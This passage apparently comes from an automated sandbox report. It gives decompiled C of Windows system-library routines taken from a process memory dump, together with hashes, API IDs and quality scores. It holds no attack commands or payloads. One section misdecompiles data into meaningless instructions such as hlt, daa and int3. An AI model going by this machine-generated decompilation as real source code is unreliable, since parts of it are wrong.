                                          						_t103 = _t111 + _t108;
                                          						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                          						_t89 = _t95 - _t111;
                                          						__eflags = _t89;
                                          						_push(0);
                                          						if(_t89 == 0) {
                                          							L15:
                                          							_t109 = 0xc000000d;
                                          							goto L16;
                                          						} else {
                                          							__eflags = _t89 - 0x7fffffff;
                                          							if(_t89 <= 0x7fffffff) {
                                          								L16:
                                          								 *(_t114 - 0x94) = _t109;
                                          								__eflags = _t109;
                                          								if(_t109 < 0) {
                                          									__eflags = _t89;
                                          									if(_t89 != 0) {
                                          										 *_t103 = 0;
                                          									}
                                          									L26:
                                          									 *(_t114 - 0xa0) = _t109;
                                          									 *(_t114 - 4) = 0xfffffffe;
                                          									__eflags = _t109;
                                          									if(_t109 >= 0) {
                                          										L31:
                                          										_t98 = _t108;
                                          										_t39 = _t98 + 1; // 0x1
                                          										_t106 = _t39;
                                          										do {
                                          											_t69 =  *_t98;
                                          											_t98 = _t98 + 1;
                                          											__eflags = _t69;
                                          										} while (_t69 != 0);
                                          										_t99 = _t98 - _t106;
                                          										__eflags = _t99;
                                          										L34:
                                          										_t70 =  *[fs:0x30];
                                          										__eflags =  *((char*)(_t70 + 2));
                                          										if( *((char*)(_t70 + 2)) != 0) {
                                          											L40:
                                          											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                          											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                          											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                          											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                          											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                          											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                          											 *(_t114 - 4) = 1;
                                          											_push(_t114 - 0x74);
                                          											L00F6DEF0(_t99, _t106);
                                          											 *(_t114 - 4) = 0xfffffffe;
                                          											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                          											goto L3;
                                          										}
                                          										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                          										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                          											goto L40;
                                          										}
                                          										_push( *((intOrPtr*)(_t114 + 8)));
                                          										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                          										_push(_t99 & 0x0000ffff);
                                          										_push(_t108);
                                          										_push(1);
                                          										_t101 = E00F5B280();
                                          										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                          										if( *((char*)(_t114 + 0x14)) == 1) {
                                          											__eflags = _t101 - 0x80000003;
                                          											if(_t101 == 0x80000003) {
                                          												E00F5B7E0(1);
                                          												_t101 = 0;
                                          												__eflags = 0;
                                          											}
                                          										}
                                          										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                          										goto L4;
                                          									}
                                          									__eflags = _t109 - 0x80000005;
                                          									if(_t109 == 0x80000005) {
                                          										continue;
                                          									}
                                          									break;
                                          								}
                                          								 *(_t114 - 0x90) = 0;
                                          								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                          								_t91 = E00F5E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                          								_t115 = _t115 + 0x10;
                                          								_t104 = _t91;
                                          								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                          								__eflags = _t104;
                                          								if(_t104 < 0) {
                                          									L21:
                                          									_t109 = 0x80000005;
                                          									 *(_t114 - 0x90) = 0x80000005;
                                          									L22:
                                          									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                          									L23:
                                          									 *(_t114 - 0x94) = _t109;
                                          									goto L26;
                                          								}
                                          								__eflags = _t104 - _t92;
                                          								if(__eflags > 0) {
                                          									goto L21;
                                          								}
                                          								if(__eflags == 0) {
                                          									goto L22;
                                          								}
                                          								goto L23;
                                          							}
                                          							goto L15;
                                          						}
                                          					}
                                          					__eflags = _t109;
                                          					if(_t109 >= 0) {
                                          						goto L31;
                                          					}
                                          					__eflags = _t109 - 0x80000005;
                                          					if(_t109 != 0x80000005) {
                                          						goto L31;
                                          					}
                                          					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                          					_t38 = _t95 - 1; // -129
                                          					_t99 = _t38;
                                          					goto L34;
                                          				}
                                          				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                          					__eflags = __edx - 0x65;
                                          					if(__edx != 0x65) {
                                          						goto L2;
                                          					}
                                          					goto L6;
                                          				}
                                          				L2:
                                          				_push( *((intOrPtr*)(_t114 + 8)));
                                          				_push(_t106);
                                          				if(E00F5A890() != 0) {
                                          					goto L6;
                                          				}
                                          				goto L3;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: _vswprintf_s
                                          • String ID:
                                          • API String ID: 677850445-0
                                          • Opcode ID: 73aacb698fea24605ae30dbcf4b3cb5b21652ae5b423bc2042530914373453be
                                          • Instruction ID: 89310a71a086947d7584e365d76e246ad4e0fa8aa6e731aa2b5ba4af72128f25
                                          • Opcode Fuzzy Hash: 73aacb698fea24605ae30dbcf4b3cb5b21652ae5b423bc2042530914373453be
                                          • Instruction Fuzzy Hash: A051F471D00259CFDB31CF64C845BAEBBB0BF04320F2081AAE95DAB281D7745D45EB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E00F3B944(signed int* __ecx, char __edx) {
                                          				signed int _v8;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				signed int* _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				intOrPtr _v76;
                                          				char _v77;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t67;
                                          				intOrPtr _t68;
                                          				char* _t73;
                                          				intOrPtr _t77;
                                          				intOrPtr _t78;
                                          				signed int _t82;
                                          				intOrPtr _t83;
                                          				void* _t87;
                                          				char _t88;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t91;
                                          				void* _t97;
                                          				intOrPtr _t100;
                                          				void* _t102;
                                          				void* _t107;
                                          				signed int _t108;
                                          				intOrPtr* _t112;
                                          				void* _t113;
                                          				intOrPtr* _t114;
                                          				intOrPtr _t115;
                                          				intOrPtr _t116;
                                          				intOrPtr _t117;
                                          				signed int _t118;
                                          				void* _t130;
                                          
                                          				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                          				_v8 =  *0x100d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                          				_t112 = __ecx;
                                          				_v77 = __edx;
                                          				_v48 = __ecx;
                                          				_v28 = 0;
                                          				_t5 = _t112 + 0xc; // 0x575651ff
                                          				_t105 =  *_t5;
                                          				_v20 = 0;
                                          				_v16 = 0;
                                          				if(_t105 == 0) {
                                          					_t50 = _t112 + 4; // 0x5de58b5b
                                          					_t60 =  *__ecx |  *_t50;
                                          					if(( *__ecx |  *_t50) != 0) {
                                          						 *__ecx = 0;
                                          						__ecx[1] = 0;
                                          						if(E00F37D50() != 0) {
                                          							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          						} else {
                                          							_t65 = 0x7ffe0386;
                                          						}
                                          						if( *_t65 != 0) {
                                          							E00FE8CD6(_t112);
                                          						}
                                          						_push(0);
                                          						_t52 = _t112 + 0x10; // 0x778df98b
                                          						_push( *_t52);
                                          						_t60 = E00F59E20();
                                          					}
                                          					L20:
                                          					_pop(_t107);
                                          					_pop(_t113);
                                          					_pop(_t87);
                                          					return E00F5B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                          				}
                                          				_t8 = _t112 + 8; // 0x8b000cc2
                                          				_t67 =  *_t8;
                                          				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                          				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                          				_t108 =  *(_t67 + 0x14);
                                          				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                          				_t105 = 0x2710;
                                          				asm("sbb eax, edi");
                                          				_v44 = _t88;
                                          				_v52 = _t108;
                                          				_t60 = E00F5CE00(_t97, _t68, 0x2710, 0);
                                          				_v56 = _t60;
                                          				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                          					L3:
                                          					 *(_t112 + 0x44) = _t60;
                                          					_t105 = _t60 * 0x2710 >> 0x20;
                                          					 *_t112 = _t88;
                                          					 *(_t112 + 4) = _t108;
                                          					_v20 = _t60 * 0x2710;
                                          					_v16 = _t60 * 0x2710 >> 0x20;
                                          					if(_v77 != 0) {
                                          						L16:
                                          						_v36 = _t88;
                                          						_v32 = _t108;
                                          						if(E00F37D50() != 0) {
                                          							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          						} else {
                                          							_t73 = 0x7ffe0386;
                                          						}
                                          						if( *_t73 != 0) {
                                          							_t105 = _v40;
                                          							E00FE8F6A(_t112, _v40, _t88, _t108);
                                          						}
                                          						_push( &_v28);
                                          						_push(0);
                                          						_push( &_v36);
                                          						_t48 = _t112 + 0x10; // 0x778df98b
                                          						_push( *_t48);
                                          						_t60 = E00F5AF60();
                                          						goto L20;
                                          					} else {
                                          						_t89 = 0x7ffe03b0;
                                          						do {
                                          							_t114 = 0x7ffe0010;
                                          							do {
                                          								_t77 =  *0x1008628; // 0x0
                                          								_v68 = _t77;
                                          								_t78 =  *0x100862c; // 0x0
                                          								_v64 = _t78;
                                          								_v72 =  *_t89;
                                          								_v76 =  *((intOrPtr*)(_t89 + 4));
                                          								while(1) {
                                          									_t105 =  *0x7ffe000c;
                                          									_t100 =  *0x7ffe0008;
                                          									if(_t105 ==  *_t114) {
                                          										goto L8;
                                          									}
                                          									asm("pause");
                                          								}
                                          								L8:
                                          								_t89 = 0x7ffe03b0;
                                          								_t115 =  *0x7ffe03b0;
                                          								_t82 =  *0x7FFE03B4;
                                          								_v60 = _t115;
                                          								_t114 = 0x7ffe0010;
                                          								_v56 = _t82;
                                          							} while (_v72 != _t115 || _v76 != _t82);
                                          							_t83 =  *0x1008628; // 0x0
                                          							_t116 =  *0x100862c; // 0x0
                                          							_v76 = _t116;
                                          							_t117 = _v68;
                                          						} while (_t117 != _t83 || _v64 != _v76);
                                          						asm("sbb edx, [esp+0x24]");
                                          						_t102 = _t100 - _v60 - _t117;
                                          						_t112 = _v48;
                                          						_t91 = _v44;
                                          						asm("sbb edx, eax");
                                          						_t130 = _t105 - _v52;
                                          						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                          							_t88 = _t102 - _t91;
                                          							asm("sbb edx, edi");
                                          							_t108 = _t105;
                                          						} else {
                                          							_t88 = 0;
                                          							_t108 = 0;
                                          						}
                                          						goto L16;
                                          					}
                                          				} else {
                                          					if( *(_t112 + 0x44) == _t60) {
                                          						goto L20;
                                          					}
                                          					goto L3;
                                          				}
                                          			}

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3B9A5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 885266447-0
                                          • Opcode ID: 5f51aeef7290a978bd517abc8cda99a9c3a586fbea64338beaad5529c63b8f88
                                          • Instruction ID: b0944d62345824871873cd402ae3b710976a7335a8accb3887a7cec10b5e88eb
                                          • Opcode Fuzzy Hash: 5f51aeef7290a978bd517abc8cda99a9c3a586fbea64338beaad5529c63b8f88
                                          • Instruction Fuzzy Hash: 7B515B71A08741CFC720DF29C490A2ABBE5FB88720F24896EFA8587355D735EC44DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 81%
                                          			E00F42581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1530200304, char _a1546911984) {
                                          				signed int _v8;
                                          				signed int _v16;
                                          				unsigned int _v24;
                                          				void* _v28;
                                          				signed int _v32;
                                          				unsigned int _v36;
                                          				signed int _v37;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _t243;
                                          				signed int _t247;
                                          				void* _t248;
                                          				signed int _t254;
                                          				signed int _t256;
                                          				intOrPtr _t258;
                                          				signed int _t261;
                                          				signed int _t268;
                                          				signed int _t271;
                                          				signed int _t279;
                                          				intOrPtr _t285;
                                          				signed int _t287;
                                          				signed int _t289;
                                          				void* _t290;
                                          				void* _t291;
                                          				signed int _t292;
                                          				unsigned int _t295;
                                          				signed int _t299;
                                          				void* _t300;
                                          				signed int _t301;
                                          				signed int _t305;
                                          				intOrPtr _t317;
                                          				signed int _t326;
                                          				signed int _t328;
                                          				signed int _t329;
                                          				signed int _t333;
                                          				signed int _t334;
                                          				signed int _t336;
                                          				signed int _t338;
                                          				signed int _t340;
                                          				void* _t341;
                                          				void* _t343;
                                          
                                          				_t338 = _t340;
                                          				_t341 = _t340 - 0x4c;
                                          				_v8 =  *0x100d360 ^ _t338;
                                          				_push(__ebx);
                                          				_push(__esi);
                                          				_push(__edi);
                                          				_t333 = 0x100b2e8;
                                          				_v56 = _a4;
                                          				_v48 = __edx;
                                          				_v60 = __ecx;
                                          				_t295 = 0;
                                          				_v80 = 0;
                                          				asm("movsd");
                                          				_v64 = 0;
                                          				_v76 = 0;
                                          				_v72 = 0;
                                          				asm("movsd");
                                          				_v44 = 0;
                                          				_v52 = 0;
                                          				_v68 = 0;
                                          				asm("movsd");
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				asm("movsd");
                                          				_v16 = 0;
                                          				_t285 = 0x48;
                                          				_t315 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                          				_t326 = 0;
                                          				_v37 = _t315;
                                          				if(_v48 <= 0) {
                                          					L16:
                                          					_t45 = _t285 - 0x48; // 0x0
                                          					__eflags = _t45 - 0xfffe;
                                          					if(_t45 > 0xfffe) {
                                          						_t334 = 0xc0000106;
                                          						goto L32;
                                          					} else {
                                          						_t333 = L00F34620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t285);
                                          						_v52 = _t333;
                                          						__eflags = _t333;
                                          						if(_t333 == 0) {
                                          							_t334 = 0xc0000017;
                                          							goto L32;
                                          						} else {
                                          							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
                                          							_t50 = _t333 + 0x48; // 0x48
                                          							_t328 = _t50;
                                          							_t315 = _v32;
                                          							 *((intOrPtr*)(_t333 + 0x3c)) = _t285;
                                          							_t287 = 0;
                                          							 *((short*)(_t333 + 0x30)) = _v48;
                                          							__eflags = _t315;
                                          							if(_t315 != 0) {
                                          								 *(_t333 + 0x18) = _t328;
                                          								__eflags = _t315 - 0x1008478;
                                          								 *_t333 = ((0 | _t315 == 0x01008478) - 0x00000001 & 0xfffffffb) + 7;
                                          								E00F5F3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
                                          								_t315 = _v32;
                                          								_t341 = _t341 + 0xc;
                                          								_t287 = 1;
                                          								__eflags = _a8;
                                          								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
                                          								if(_a8 != 0) {
                                          									_t279 = E00FA39F2(_t328);
                                          									_t315 = _v32;
                                          									_t328 = _t279;
                                          								}
                                          							}
                                          							_t299 = 0;
                                          							_v16 = 0;
                                          							__eflags = _v48;
                                          							if(_v48 <= 0) {
                                          								L31:
                                          								_t334 = _v68;
                                          								__eflags = 0;
                                          								 *((short*)(_t328 - 2)) = 0;
                                          								goto L32;
                                          							} else {
                                          								_t289 = _t333 + _t287 * 4;
                                          								_v56 = _t289;
                                          								do {
                                          									__eflags = _t315;
                                          									if(_t315 != 0) {
                                          										_t243 =  *(_v60 + _t299 * 4);
                                          										__eflags = _t243;
                                          										if(_t243 == 0) {
                                          											goto L30;
                                          										} else {
                                          											__eflags = _t243 == 5;
                                          											if(_t243 == 5) {
                                          												goto L30;
                                          											} else {
                                          												goto L22;
                                          											}
                                          										}
                                          									} else {
                                          										L22:
                                          										 *_t289 =  *(_v60 + _t299 * 4);
                                          										 *(_t289 + 0x18) = _t328;
                                          										_t247 =  *(_v60 + _t299 * 4);
                                          										__eflags = _t247 - 8;
                                          										if(_t247 > 8) {
                                          											goto L56;
                                          										} else {
                                          											switch( *((intOrPtr*)(_t247 * 4 +  &M00F42959))) {
                                          												case 0:
                                          													__ax =  *0x1008488;
                                          													__eflags = __ax;
                                          													if(__ax == 0) {
                                          														goto L29;
                                          													} else {
                                          														__ax & 0x0000ffff = E00F5F3E0(__edi,  *0x100848c, __ax & 0x0000ffff);
                                          														__eax =  *0x1008488 & 0x0000ffff;
                                          														goto L26;
                                          													}
                                          													goto L108;
                                          												case 1:
                                          													L45:
                                          													E00F5F3E0(_t328, _v80, _v64);
                                          													_t274 = _v64;
                                          													goto L26;
                                          												case 2:
                                          													 *0x1008480 & 0x0000ffff = E00F5F3E0(__edi,  *0x1008484,  *0x1008480 & 0x0000ffff);
                                          													__eax =  *0x1008480 & 0x0000ffff;
                                          													__eax = ( *0x1008480 & 0x0000ffff) >> 1;
                                          													__edi = __edi + __eax * 2;
                                          													goto L28;
                                          												case 3:
                                          													__eax = _v44;
                                          													__eflags = __eax;
                                          													if(__eax == 0) {
                                          														goto L29;
                                          													} else {
                                          														__esi = __eax + __eax;
                                          														__eax = E00F5F3E0(__edi, _v72, __esi);
                                          														__edi = __edi + __esi;
                                          														__esi = _v52;
                                          														goto L27;
                                          													}
                                          													goto L108;
                                          												case 4:
                                          													_push(0x2e);
                                          													_pop(__eax);
                                          													 *(__esi + 0x44) = __edi;
                                          													 *__edi = __ax;
                                          													__edi = __edi + 4;
                                          													_push(0x3b);
                                          													_pop(__eax);
                                          													 *(__edi - 2) = __ax;
                                          													goto L29;
                                          												case 5:
                                          													__eflags = _v36;
                                          													if(_v36 == 0) {
                                          														goto L45;
                                          													} else {
                                          														E00F5F3E0(_t328, _v76, _v36);
                                          														_t274 = _v36;
                                          													}
                                          													L26:
                                          													_t341 = _t341 + 0xc;
                                          													_t328 = _t328 + (_t274 >> 1) * 2 + 2;
                                          													__eflags = _t328;
                                          													L27:
                                          													_push(0x3b);
                                          													_pop(_t276);
                                          													 *((short*)(_t328 - 2)) = _t276;
                                          													goto L28;
                                          												case 6:
                                          													__ebx =  *0x100575c;
                                          													__eflags = __ebx - 0x100575c;
                                          													if(__ebx != 0x100575c) {
                                          														_push(0x3b);
                                          														_pop(__esi);
                                          														do {
                                          															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                          															E00F5F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                          															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                          															__edi = __edi + __eax * 2;
                                          															__edi = __edi + 2;
                                          															 *(__edi - 2) = __si;
                                          															__ebx =  *__ebx;
                                          															__eflags = __ebx - 0x100575c;
                                          														} while (__ebx != 0x100575c);
                                          														__esi = _v52;
                                          														__ecx = _v16;
                                          														__edx = _v32;
                                          													}
                                          													__ebx = _v56;
                                          													goto L29;
                                          												case 7:
                                          													 *0x1008478 & 0x0000ffff = E00F5F3E0(__edi,  *0x100847c,  *0x1008478 & 0x0000ffff);
                                          													__eax =  *0x1008478 & 0x0000ffff;
                                          													__eax = ( *0x1008478 & 0x0000ffff) >> 1;
                                          													__eflags = _a8;
                                          													__edi = __edi + __eax * 2;
                                          													if(_a8 != 0) {
                                          														__ecx = __edi;
                                          														__eax = E00FA39F2(__ecx);
                                          														__edi = __eax;
                                          													}
                                          													goto L28;
                                          												case 8:
                                          													__eax = 0;
                                          													 *(__edi - 2) = __ax;
                                          													 *0x1006e58 & 0x0000ffff = E00F5F3E0(__edi,  *0x1006e5c,  *0x1006e58 & 0x0000ffff);
                                          													 *(__esi + 0x38) = __edi;
                                          													__eax =  *0x1006e58 & 0x0000ffff;
                                          													__eax = ( *0x1006e58 & 0x0000ffff) >> 1;
                                          													__edi = __edi + __eax * 2;
                                          													__edi = __edi + 2;
                                          													L28:
                                          													_t299 = _v16;
                                          													_t315 = _v32;
                                          													L29:
                                          													_t289 = _t289 + 4;
                                          													__eflags = _t289;
                                          													_v56 = _t289;
                                          													goto L30;
                                          											}
                                          										}
                                          									}
                                          									goto L108;
                                          									L30:
                                          									_t299 = _t299 + 1;
                                          									_v16 = _t299;
                                          									__eflags = _t299 - _v48;
                                          								} while (_t299 < _v48);
                                          								goto L31;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					while(1) {
                                          						L1:
                                          						_t247 =  *(_v60 + _t326 * 4);
                                          						if(_t247 > 8) {
                                          							break;
                                          						}
                                          						switch( *((intOrPtr*)(_t247 * 4 +  &M00F42935))) {
                                          							case 0:
                                          								__ax =  *0x1008488;
                                          								__eflags = __ax;
                                          								if(__ax != 0) {
                                          									__eax = __ax & 0x0000ffff;
                                          									__ebx = __ebx + 2;
                                          									__eflags = __ebx;
                                          									goto L53;
                                          								}
                                          								goto L14;
                                          							case 1:
                                          								L44:
                                          								_t315 =  &_v64;
                                          								_v80 = E00F42E3E(0,  &_v64);
                                          								_t285 = _t285 + _v64 + 2;
                                          								goto L13;
                                          							case 2:
                                          								__eax =  *0x1008480 & 0x0000ffff;
                                          								__ebx = __ebx + __eax;
                                          								__eflags = __dl;
                                          								if(__dl != 0) {
                                          									__eax = 0x1008480;
                                          									goto L80;
                                          								}
                                          								goto L14;
                                          							case 3:
                                          								__eax = E00F2EEF0(0x10079a0);
                                          								__eax =  &_v44;
                                          								_push(__eax);
                                          								_push(0);
                                          								_push(0);
                                          								_push(4);
                                          								_push(L"PATH");
                                          								_push(0);
                                          								L57();
                                          								__esi = __eax;
                                          								_v68 = __esi;
                                          								__eflags = __esi - 0xc0000023;
                                          								if(__esi != 0xc0000023) {
                                          									L10:
                                          									__eax = E00F2EB70(__ecx, 0x10079a0);
                                          									__eflags = __esi - 0xc0000100;
                                          									if(__esi == 0xc0000100) {
                                          										_v44 = _v44 & 0x00000000;
                                          										__eax = 0;
                                          										_v68 = 0;
                                          										goto L13;
                                          									} else {
                                          										__eflags = __esi;
                                          										if(__esi < 0) {
                                          											L32:
                                          											_t221 = _v72;
                                          											__eflags = _t221;
                                          											if(_t221 != 0) {
                                          												L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
                                          											}
                                          											_t222 = _v52;
                                          											__eflags = _t222;
                                          											if(_t222 != 0) {
                                          												__eflags = _t334;
                                          												if(_t334 < 0) {
                                          													L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
                                          													_t222 = 0;
                                          												}
                                          											}
                                          											goto L36;
                                          										} else {
                                          											__eax = _v44;
                                          											__ebx = __ebx + __eax * 2;
                                          											__ebx = __ebx + 2;
                                          											__eflags = __ebx;
                                          											L13:
                                          											_t295 = _v36;
                                          											goto L14;
                                          										}
                                          									}
                                          								} else {
                                          									__eax = _v44;
                                          									__ecx =  *0x1007b9c; // 0x0
                                          									_v44 + _v44 =  *[fs:0x30];
                                          									__ecx = __ecx + 0x180000;
                                          									__eax = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                          									_v72 = __eax;
                                          									__eflags = __eax;
                                          									if(__eax == 0) {
                                          										__eax = E00F2EB70(__ecx, 0x10079a0);
                                          										__eax = _v52;
                                          										L36:
                                          										_pop(_t327);
                                          										_pop(_t335);
                                          										__eflags = _v8 ^ _t338;
                                          										_pop(_t286);
                                          										return E00F5B640(_t222, _t286, _v8 ^ _t338, _t315, _t327, _t335);
                                          									} else {
                                          										__ecx =  &_v44;
                                          										_push(__ecx);
                                          										_push(_v44);
                                          										_push(__eax);
                                          										_push(4);
                                          										_push(L"PATH");
                                          										_push(0);
                                          										L57();
                                          										__esi = __eax;
                                          										_v68 = __eax;
                                          										goto L10;
                                          									}
                                          								}
                                          								goto L108;
                                          							case 4:
                                          								__ebx = __ebx + 4;
                                          								goto L14;
                                          							case 5:
                                          								_t281 = _v56;
                                          								if(_v56 != 0) {
                                          									_t315 =  &_v36;
                                          									_t283 = E00F42E3E(_t281,  &_v36);
                                          									_t295 = _v36;
                                          									_v76 = _t283;
                                          								}
                                          								if(_t295 == 0) {
                                          									goto L44;
                                          								} else {
                                          									_t285 = _t285 + 2 + _t295;
                                          								}
                                          								goto L14;
                                          							case 6:
                                          								__eax =  *0x1005764 & 0x0000ffff;
                                          								goto L53;
                                          							case 7:
                                          								__eax =  *0x1008478 & 0x0000ffff;
                                          								__ebx = __ebx + __eax;
                                          								__eflags = _a8;
                                          								if(_a8 != 0) {
                                          									__ebx = __ebx + 0x16;
                                          									__ebx = __ebx + __eax;
                                          								}
                                          								__eflags = __dl;
                                          								if(__dl != 0) {
                                          									__eax = 0x1008478;
                                          									L80:
                                          									_v32 = __eax;
                                          								}
                                          								goto L14;
                                          							case 8:
                                          								__eax =  *0x1006e58 & 0x0000ffff;
                                          								__eax = ( *0x1006e58 & 0x0000ffff) + 2;
                                          								L53:
                                          								__ebx = __ebx + __eax;
                                          								L14:
                                          								_t326 = _t326 + 1;
                                          								if(_t326 >= _v48) {
                                          									goto L16;
                                          								} else {
                                          									_t315 = _v37;
                                          									goto L1;
                                          								}
                                          								goto L108;
                                          						}
                                          					}
                                          					L56:
                                          					_t300 = 0x25;
                                          					asm("int 0x29");
                                          					asm("out 0x28, al");
                                          					asm("hlt");
                                          					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t247;
                                          					asm("hlt");
                                          					_t248 = _t247 + _t247;
                                          					asm("daa");
                                          					asm("hlt");
                                          					 *_t333 =  *_t333 + _t300;
                                          					asm("hlt");
                                          					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t248;
                                          					asm("hlt");
                                          					 *0x1f00f426 =  *0x1f00f426 + _t248;
                                          					_pop(_t290);
                                          					asm("clc");
                                          					 *((intOrPtr*)(_t248 +  &_a1530200304)) =  *((intOrPtr*)(_t248 +  &_a1530200304)) + _t315;
                                          					asm("clc");
                                          					 *_t315 =  *_t315 + _t248;
                                          					_t343 = _t341 - _t333;
                                          					 *((intOrPtr*)(_t248 - 0x9ff0bd8)) =  *((intOrPtr*)(_t248 - 0x9ff0bd8)) + _t248;
                                          					asm("daa");
                                          					asm("hlt");
                                          					 *_t333 =  *_t333 + _t290;
                                          					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t300;
                                          					asm("hlt");
                                          					_a35 = _a35 + _t290;
                                          					asm("hlt");
                                          					_pop(_t291);
                                          					asm("clc");
                                          					 *((intOrPtr*)(_t248 - _t315 + _t290 +  &_a1546911984)) =  *((intOrPtr*)(_t248 - _t315 + _t290 +  &_a1546911984)) + _t315;
                                          					asm("clc");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					_push(0x20);
                                          					_push(0xfeff00);
                                          					E00F6D08C(_t291, _t328, _t333);
                                          					_v44 =  *[fs:0x18];
                                          					_t329 = 0;
                                          					 *_a24 = 0;
                                          					_t292 = _a12;
                                          					__eflags = _t292;
                                          					if(_t292 == 0) {
                                          						_t254 = 0xc0000100;
                                          					} else {
                                          						_v8 = 0;
                                          						_t336 = 0xc0000100;
                                          						_v52 = 0xc0000100;
                                          						_t256 = 4;
                                          						while(1) {
                                          							_v40 = _t256;
                                          							__eflags = _t256;
                                          							if(_t256 == 0) {
                                          								break;
                                          							}
                                          							_t305 = _t256 * 0xc;
                                          							_v48 = _t305;
                                          							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0xef1664));
                                          							if(__eflags <= 0) {
                                          								if(__eflags == 0) {
                                          									_t271 = E00F5E5C0(_a8,  *((intOrPtr*)(_t305 + 0xef1668)), _t292);
                                          									_t343 = _t343 + 0xc;
                                          									__eflags = _t271;
                                          									if(__eflags == 0) {
                                          										_t336 = E00F951BE(_t292,  *((intOrPtr*)(_v48 + 0xef166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
                                          										_v52 = _t336;
                                          										break;
                                          									} else {
                                          										_t256 = _v40;
                                          										goto L62;
                                          									}
                                          									goto L70;
                                          								} else {
                                          									L62:
                                          									_t256 = _t256 - 1;
                                          									continue;
                                          								}
                                          							}
